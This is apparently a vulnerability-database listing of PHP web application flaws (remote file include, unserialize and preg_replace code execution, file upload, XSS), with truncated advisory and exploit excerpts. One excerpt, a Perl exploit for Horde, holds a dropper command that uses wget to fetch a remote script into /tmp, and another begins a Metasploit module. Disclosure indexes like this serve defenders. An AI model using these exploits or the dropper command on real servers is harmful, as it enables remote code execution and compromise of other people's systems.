Zentrack 2.2/2.3/2.4 Index.PHP Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/7843/info A remote file include vulnerability has been reported for Zentrack. Due to insufficient sanitization of some user-supplied variables by the 'index.php' script, it is possible for a remote attacker to include a...

Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution

No description provided by source. ?php / ---------------------------------------------------------------- Invision Power Board = 3.3.4 unserialize PHP Code Execution ---------------------------------------------------------------- author..............: Egidio Romano aka EgiX mail...................

HiveMail 1.2.2/1.3 addressbook.update.php contactgroupid Variable Arbitrary PHP Command Execution

No description provided by source. source: http://www.securityfocus.com/bid/16591/info HiveMail is prone to multiple vulnerabilities. These vulnerabilities may allow the execution of arbitrary PHP code, cross-site scripting attacks, and SQL injection. The PHP code-execution issues are the result ...

Double Choco Latte 0.9.3/0.9.4 main.php Arbitrary PHP Code Execution

No description provided by source. source: http://www.securityfocus.com/bid/12894/info Double Choco Latte is reported prone to multiple vulnerabilities. These issues result from insufficient sanitization of user-supplied data and may allow an attacker to carry out cross-site scripting/HTML...

Tiki Wiki CMS Groupware <= 8.3 "unserialize()" PHP Code Execution

Tiki Wiki CMS Groupware 'unserialize'多个远程PHP代码执行漏洞 漏洞类型： 设计缺陷 漏洞成因： Tiki Wiki CMS Groupware v6.9、9.3之前版本存在安全漏洞，某些脚本对用户控制的输入使用了 "unserialize"操作，攻击者可利用此漏洞在受影响应用中注入和执行任意PHP代码。 修补建议： 更新到最新版本 http://info.tiki.org/article210-Tiki-10-0-is-here ?php /...

Barryvan Compo Manager 0.3 - 'main.php' Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/28035/info Barryvan Compo Manager is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containin...

DoceboLMS 2.0.x Lang Parameter Multiple Remote File Include Vulnerabilities

No description provided by source. source: http://www.securityfocus.com/bid/18110/info DoceboLMS is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these issues to include...

InstantCMS 1.6 - Remote PHP Code Execution

No description provided by source. require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initializeinfo = superupdateinfoinfo, 'Name' = 'InstantCMS 1.6 Remote PHP Code Execution', 'Description' = %q This module exploits an...

CMS Made Simple 0.10 Lang.PHP Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/14709/info CMS Made Simple is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may exploit this issue to execute arbitra...

LS Simple Guestbook 1.0 - Remote Code Execution Vulnerability

No description provided by source. Special Greetings To - Timq,Warpboy,The-Maggot File: index.php Affects: LS simple guestbook v1 Date: 15th April 2007 Issue Description: =========================================================================== LS simple guestbook fails to sanitize user input...

Magic News Plus 1.0.2 n_layouts.php link_parameters Parameter XSS

No description provided by source. source: http://www.securityfocus.com/bid/22661/info Magic News Pro is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. These issues include a remote file-include issue and two cross-site...

bcoos 1.0.13 'include/common.php' Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/31929/info The 'bcoos' program is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing...

HiveMail 1.2.2/1.3 index.php $_SERVER['PHP_SELF'] XSS

No description provided by source. source: http://www.securityfocus.com/bid/16591/info HiveMail is prone to multiple vulnerabilities. These vulnerabilities may allow the execution of arbitrary PHP code, cross-site scripting attacks, and SQL injection. The PHP code-execution issues are the result ...

Horde Framework Unserialize PHP Code Execution

ported from metasploit by irrlicht june 2014 modify dropper url and run use strict; use warnings; use LWP::UserAgent; use WWW::Mechanize; use MIME::Base64; if !$ARGV0 print "specify full login.php url\n"; exit; my $dropper = 'system"mkdir /tmp/\" \"; cd /tmp/\" \"; wget -O deploy.pl...

CVE-2013-5352

Sharetronix 3.1.1.3 and earlier versions are vulnerable to remote PHP code execution via the activities_text parameter to /services/activities/set or the comments_text parameter to /services/comments/set, caused by unsafe handling of the PHP preg_replace function with the /e modifier. The vulnera...

Design/Logic Flaw

The Yaml::parse function in Symfony 2.0.x before 2.0.22 remote attackers to execute arbitrary PHP code via a PHP file, a different vulnerability than CVE-2013-1397...

CVE-2013-1397

CVE-2013-1397 affects Symfony 2.0.x before 2.0.22, 2.1.x before 2.1.7, and 2.2.x, where a remote attacker can execute arbitrary PHP code by sending a serialized PHP object to the Yaml::parse or Yaml\Parser::parse function. Root cause: insecure handling in YAML parsing leading to code execution. I...

Clipperz Password Manager RCE Vulnerability (May 2014) - Active Check

Clipperz Password Manager is prone to a remote code execution RCE vulnerability. SPDX-FileCopyrightText: 2014 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

Dotclear 2.6.2 Arbitrary File Upload

------------------------------------------------------------------------ Dotclear = 2.6.2 Media Manager Unrestricted File Upload Vulnerability ------------------------------------------------------------------------ - Software Link: http://dotclear.org/ - Affected Versions: Version 2.6.2 and...

Clipperz Password Manager Code Execution Vulnerability

Clipperz Password Manager suffers from a remote code execution vulnerability. Exploit Title : Clipperz Password Manager remote code execution vulnerability Author : Manish Kishan Tanwar Vendor : https://clipperz.is/opensource/clipperzpasswordmanager/ Download Link :...